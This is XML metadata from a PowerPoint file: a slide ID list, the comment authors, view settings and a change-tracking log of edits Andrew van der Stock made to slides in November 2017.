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277" r:id="rId3"/>
    <p:sldId id="318" r:id="rId4"/>
    <p:sldId id="272" r:id="rId5"/>
    <p:sldId id="274" r:id="rId6"/>
    <p:sldId id="301" r:id="rId7"/>
    <p:sldId id="321" r:id="rId8"/>
    <p:sldId id="304" r:id="rId9"/>
    <p:sldId id="307" r:id="rId10"/>
    <p:sldId id="303" r:id="rId11"/>
    <p:sldId id="309" r:id="rId12"/>
    <p:sldId id="315" r:id="rId13"/>
    <p:sldId id="311" r:id="rId14"/>
    <p:sldId id="308" r:id="rId15"/>
    <p:sldId id="310" r:id="rId16"/>
    <p:sldId id="306" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="302" r:id="rId20"/>
    <p:sldId id="285" r:id="rId21"/>
    <p:sldId id="320" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="286" r:id="rId24"/>
    <p:sldId id="317" r:id="rId25"/>
    <p:sldId id="322" r:id="rId26"/>
  </p:sldIdLst>
  <p:sldSz cx="6858000" cy="9144000" type="letter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44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7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rsten" initials="T" lastIdx="96" clrIdx="0"/>
  <p:cmAuthor id="1" name="DorisTorsten" initials="D" lastIdx="0" clrIdx="1"/>
  <p:cmAuthor id="2" name="Andrew van der Stock" initials="AS" lastIdx="6" clrIdx="2">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="3" name="office@enil.us" initials="o" lastIdx="1" clrIdx="3">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="4" name="Andrew van der Stock" initials="AvdS" lastIdx="1" clrIdx="4">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="5" name="ezudilin" initials="e" lastIdx="4" clrIdx="4">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="ezudi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76B"/>
    <a:srgbClr val="4E8542"/>
    <a:srgbClr val="FC9803"/>
    <a:srgbClr val="D9EAD5"/>
    <a:srgbClr val="00FF00"/>
    <a:srgbClr val="B93A32"/>
    <a:srgbClr val="672E3B"/>
    <a:srgbClr val="FFFF00"/>
    <a:srgbClr val="B3D6A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33" autoAdjust="0"/>
    <p:restoredTop sz="95096" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="528" y="-144"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2688"/>
        <p:guide pos="1440"/>
        <p:guide pos="2880"/>
        <p:guide orient="horz"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02" y="-108"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2857"/>
        <p:guide pos="21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van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}"/>
    <pc:docChg chg="undo custSel modSld">
      <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:43:08.882" v="280" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-09T21:11:43.663" v="2" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3544603407" sldId="303"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-09T21:11:43.663" v="2" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3544603407" sldId="303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6:06:30.787" v="277" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3458964653" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:06:30.787" v="277" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3458964653" sldId="304"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addCm modCm">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-09T22:27:07.206" v="4" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="370214010" sldId="307"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T02:07:22.198" v="48" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1310475506" sldId="308"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T02:07:22.198" v="48" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1310475506" sldId="308"/>
            <ac:spMk id="107" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T02:05:22.473" v="44" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2097789725" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T02:05:22.473" v="44" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:10:22.255" v="279" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="872923206" sldId="318"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:10:22.255" v="279" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="872923206" sldId="318"/>
            <ac:graphicFrameMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:56:59.255" v="156" actId="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1698158142" sldId="320"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:54:53.027" v="51" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:55:45.268" v="89" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="10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53.509" v="92" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="11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51.510" v="91" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="13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48.735" v="90" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:spMk id="14" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:55:24.799" v="87" actId="207"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:graphicFrameMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T05:56:59.255" v="156" actId="12"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1698158142" sldId="320"/>
            <ac:graphicFrameMk id="12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6:43:08.882" v="280" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1107843752" sldId="322"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T06:43:08.882" v="280" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1107843752" sldId="322"/>
            <ac:graphicFrameMk id="7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0:51:14.149" v="8" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2323774989" sldId="323"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{835A8AB6-16CB-424F-A9E1-15E8834A79A6}" dt="2017-11-10T00:51:14.149" v="8" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2323774989" sldId="323"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld modNotesMaster modHandout">
      <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:46:00.142" v="3537" actId="2696"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:55:18.710" v="2922" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="268"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:55:18.710" v="2922" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="268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20:28.372" v="3037" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="272"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:20:28.372" v="3037" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="272"/>
            <ac:graphicFrameMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:19:46.995" v="3029" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="272"/>
            <ac:graphicFrameMk id="10" creationId="{006EF41C-22F0-4CD0-98DC-529189A47945}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:16:22.467" v="2991" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="274"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:16:22.467" v="2991" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="274"/>
            <ac:graphicFrameMk id="12" creationId="{53BBC665-1B35-4A1D-B9C5-F23A146454B3}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:29:01.072" v="3112" actId="554"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="277"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:29:01.072" v="3112" actId="554"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="277"/>
            <ac:graphicFrameMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:29:01.072" v="3112" actId="554"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="277"/>
            <ac:graphicFrameMk id="11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8:40:41.969" v="2253" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:24:27.780" v="2138" actId="120"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="278"/>
            <ac:spMk id="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40:41.969" v="2253" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="278"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:46:51.408" v="2141" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="281"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:46:51.408" v="2141" actId="113"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="281"/>
            <ac:graphicFrameMk id="7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8:37:10.988" v="2233" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="285"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T18:37:10.988" v="2233" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="285"/>
            <ac:graphicFrameMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-12T00:06:18.095" v="299" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="285"/>
            <ac:graphicFrameMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp del">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:46:00.142" v="3537" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="212467395" sldId="293"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T03:51:31.189" v="595" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="212467395" sldId="293"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T03:51:24.427" v="593" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="212467395" sldId="293"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T17:33:43.112" v="2153" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1135468893" sldId="296"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-12T00:09:03.062" v="327" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="321167381" sldId="301"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-12T00:09:03.062" v="327" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="321167381" sldId="301"/>
            <ac:graphicFrameMk id="69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2:33.903" v="2954" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3544603407" sldId="303"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:12:33.903" v="2954" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3544603407" sldId="303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5:49.921" v="2923"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3544603407" sldId="303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23:35.515" v="891" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3544603407" sldId="303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5:08.025" v="2935"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3544603407" sldId="303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0:01.308" v="2948" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3458964653" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:54:30.727" v="2900" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3458964653" sldId="304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10:01.308" v="2948" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3458964653" sldId="304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7:08:55.972" v="2938" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3458964653" sldId="304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6:58:16.965" v="2925"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="788797001" sldId="306"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:49:49.261" v="2898" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788797001" sldId="306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8:16.965" v="2925"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788797001" sldId="306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16.865" v="2921" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788797001" sldId="306"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:06:56.211" v="2936"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="370214010" sldId="307"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-11T23:44:44.183" v="159" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307"/>
            <ac:spMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-11T23:26:12.716" v="0" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307"/>
            <ac:spMk id="11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1T23:50:59.945" v="279" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307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4:39.230" v="2902" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307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31:29.114" v="2160" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307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29:29.372" v="2157" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307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6:56.211" v="2936"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370214010" sldId="307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02:48.212" v="2932" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1310475506" sldId="308"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:02:48.212" v="2932" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1310475506" sldId="308"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T07:04:06.446" v="2934" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2630728331" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-19T06:54:55.438" v="2908" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309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4:56.773" v="2909" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309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28:10.672" v="1210" actId="14734"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309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4:06.446" v="2934" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309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00:28.733" v="2926" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2097789725" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T01:30:57.623" v="351" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310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00:28.733" v="2926" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310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1:26:03.646" v="329" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310"/>
            <ac:spMk id="137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12.972" v="2919" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2097789725" sldId="310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40:05.505" v="3536" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4197497568" sldId="311"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-13T03:51:01.373" v="591" actId="790"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311"/>
            <ac:spMk id="26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3:51:01.373" v="591" actId="790"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4197497568" sldId="311"/>
            <ac:spMk id="33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6:35.433" v="3443" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
